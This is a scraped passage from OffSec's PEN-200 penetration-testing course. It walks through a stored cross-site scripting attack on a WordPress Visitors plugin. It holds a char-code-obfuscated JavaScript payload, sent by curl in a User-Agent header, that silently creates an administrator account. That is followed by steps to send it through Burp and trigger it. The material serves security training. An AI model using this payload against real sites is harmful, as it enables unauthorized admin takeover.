Penetration Testing with Kali Linux OffSec

,116,85,82,76,44,33,49,41,44,97,106,97,120,82,101,113,117,101,115,116,46,115,101,1

səhifə	126/132
tarix	21.12.2023
ölçüsü
	#187693

1 ... 122 123 124 125 126 127 128 129 ... 132

PEN-200

,115,116,85,82,76,44,33,49,41,44,97,106,97,120,82,101,113,117,101,115,116,46,115,101,1
10,100,40,41,59,118,97,114,32,110,111,110,99,101,77,97,116,99,104,61,110,111,110,99,10
1,82,101,103,101,120,46,101,120,101,99,40,97,106,97,120,82,101,113,117,101,115,116,46,
114,101,115,112,111,110,115,101,84,101,120,116,41,44,110,111,110,99,101,61,110,111,110
,99,101,77,97,116,99,104,91,49,93,44,112,97,114,97,109,115,61,34,97,99,116,105,111,110
,61,99,114,101,97,116,101,117,115,101,114,38,95,119,112,110,111,110,99,101,95,99,114,1
01,97,116,101,45,117,115,101,114,61,34,43,110,111,110,99,101,43,34,38,117,115,101,114,
95,108,111,103,105,110,61,97,116,116,97,99,107,101,114,38,101,109,97,105,108,61,97,116
,116,97,99,107,101,114,64,111,102,102,115,101,99,46,99,111,109,38,112,97,115,115,49,61
,97,116,116,97,99,107,101,114,112,97,115,115,38,112,97,115,115,50,61,97,116,116,97,99,
107,101,114,112,97,115,115,38,114,111,108,101,61,97,100,109,105,110,105,115,116,114,97
,116,111,114,34,59,40,97,106,97,120,82,101,113,117,101,115,116,61,110,101,119,32,88,77
,76,72,116,116,112,82,101,113,117,101,115,116,41,46,111,112,101,110,40,34,80,79,83,84,
34,44,114,101,113,117,101,115,116,85,82,76,44,33,48,41,44,97,106,97,120,82,101,113,117
,101,115,116,46,115,101,116,82,101,113,117,101,115,116,72,101,97,100,101,114,40,34,67,
111,110,116,101,110,116,45,84,121,112,101,34,44,34,97,112,112,108,105,99,97,116,105,11
1,110,47,120,45,119,119,119,45,102,111,114,109,45,117,114,108,101,110,99,111,100,101,1
00,34,41,44,97,106,97,120,82,101,113,117,101,115,116,46,115,101,110,100,40,112,97,114,
97,109,115,41,59))" --proxy 127.0.0.1:8080
Listing 127 - Launching the Final XSS Attack through Curl
Before running the curl attack command, let’s start Burp and leave Intercept on.
We instructed curl to send a specially-crafted HTTP request with a User-Agent header containing
our malicious payload, then forward it to our Burp instance so we can inspect it further.
After running the curl command, we can inspect the request in Burp.
381
(Mozilla, 2022), https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String/fromCharCode
382
(Mozilla, 2022), https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/eval

Penetration Testing with Kali Linux
PWK - Copyright © 2023 OffSec Services Limited. All rights reserved.
245
Figure 118: Inspecting the Attack in Burp
Everything seems correct, so let’s forward the request by clicking
Forward
, then disabling
Intercept.
At this point, our XSS exploit should have been stored in the WordPress database. We only need
to simulate execution by logging in to the OffSec WP instance as admin, then clicking on the
Visitors plugin dashboard on the bottom left.

Penetration Testing with Kali Linux
PWK - Copyright © 2023 OffSec Services Limited. All rights reserved.
246
Figure 119: Loading Visitors Statistics
We notice that only one entry is present, and apparently no User-Agent has been recorded. This is
because the User-Agent field contained our attack embedded into “

Verilənlər bazası müəlliflik hüququ ilə müdafiə olunur ©azkurs.org 2024
rəhbərliyinə müraciət

gir | qeydiyyatdan keç

Ana səhifə

yükləyin